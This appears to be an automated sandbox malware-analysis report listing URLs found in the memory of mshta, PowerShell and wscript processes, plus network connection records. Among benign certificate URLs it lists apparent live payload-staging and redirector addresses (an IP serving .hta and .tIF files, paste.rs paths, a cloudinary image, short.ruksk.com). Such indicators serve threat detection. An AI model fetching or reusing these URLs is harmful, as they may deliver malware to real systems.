Source: mshta.exe, 00000012.00000002.492270253.0000000003CED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491675537.0000000003CED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.htasY4K
Source: mshta.exe, 00000004.00000003.434003137.00000000004D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.htat
Source: powershell.exe, 00000008.00000002.457674292.00000000029D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.498637562.0000000002673000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.29/808/verynice
Source: powershell.exe, 00000016.00000002.498637562.0000000002673000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.501343114.000000001AD68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.29/808/verynicecreamychickenfvouratedishesforeveryonewhoinonlinewith.tIF
Source: powershell.exe, 00000016.00000002.498074917.00000000001E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.29/808/verynicecreamychickenfvouratedishesforeveryonewhoinonlinewith.tIF/
Source: powershell.exe, 00000008.00000002.461003227.000000001C2B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.504255540.000000001C280000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.501343114.000000001AD68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.29/808/verynicecreamychickenfvouratedishesforeveryonewhoinonlinewith.tIFC:
Source: powershell.exe, 00000008.00000002.457451586.00000000004AE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C32C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.498074917.00000000001E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.29/808/verynicecreamychickenfvouratedishesforeveryonewhoinonlinewith.tIFl
Source: powershell.exe, 00000008.00000002.457674292.00000000029D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.498637562.0000000002673000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.29/808/verynicecreamychickenfvouratedishesforeveryonewhoinonlinewith.tIFp
Source: mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D9A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D9A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.0000000004738000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C28A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492430617.0000000004920000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.460637378.000000001A645000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D9A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D9A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 0000000F.00000002.520578292.0000000000426000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.6
Source: powershell.exe, 00000008.00000002.457674292.00000000029D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.498637562.0000000002A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.micros
Source: powershell.exe, 00000008.00000002.460373487.00000000124E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492430617.0000000004920000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C28A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000008.00000002.457674292.00000000024B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.521154149.00000000021D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.498637562.0000000002471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.556031771.0000000002276000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000008.00000002.460373487.00000000124E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.460373487.00000000124E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.460373487.00000000124E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000008.00000002.460373487.00000000124E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: wscript.exe, 0000000E.00000002.469658400.00000000041DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.00000000046D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.rs/
Source: wscript.exe, 0000000E.00000003.466927563.000000000011F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467156668.0000000000145000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467752807.00000000000D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469167608.0000000000145000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.466657074.00000000039E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467377292.00000000000D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467610460.00000000000D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.466460293.0000000000140000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000003.509294834.0000000003A10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000003.509060438.000000000041F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000003.506078670.0000000000440000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000003.509085589.0000000000445000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509573074.0000000000445000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.rs/ACRWC
Source: wscript.exe, 0000001A.00000002.509713850.00000000046B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.rs/ACRWCS-1-5-21-966771315-3019405637-367336477-1006
Source: wscript.exe, 0000001A.00000003.509150838.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000003.509409048.00000000003D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.rs/ACRWCy
Source: powershell.exe, 0000000F.00000002.521154149.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.556031771.0000000002471000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://res.cloudinary.com
Source: powershell.exe, 0000001B.00000002.556031771.0000000002471000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg
Source: powershell.exe, 0000000F.00000002.521154149.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.556031771.0000000002471000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgX
Source: mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C28A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492430617.0000000004920000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: mshta.exe, 00000004.00000003.435929278.0000000003C83000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C83000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C83000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438873247.0000000003C2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C83000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439302235.0000000003C2D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492270253.0000000003CED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492452916.0000000004964000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491728979.0000000004964000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491675537.0000000003CED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.483554413.0000000004964000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://short.ruksk.com/
Source: mshta.exe, 00000012.00000002.492043428.000000000037B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://short.ruksk.com/wAvDWQ?&leg=fortunate&district=coherent&vibraphone=symptomatic&ronald=fine&k

Source: unknown	Network traffic detected: HTTP traffic on port 49161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49163
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49161
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 443

Source: unknown	HTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.22:49163 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.63.94.214:443 -> 192.168.2.22:49166 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.22:49171 version: TLS 1.2
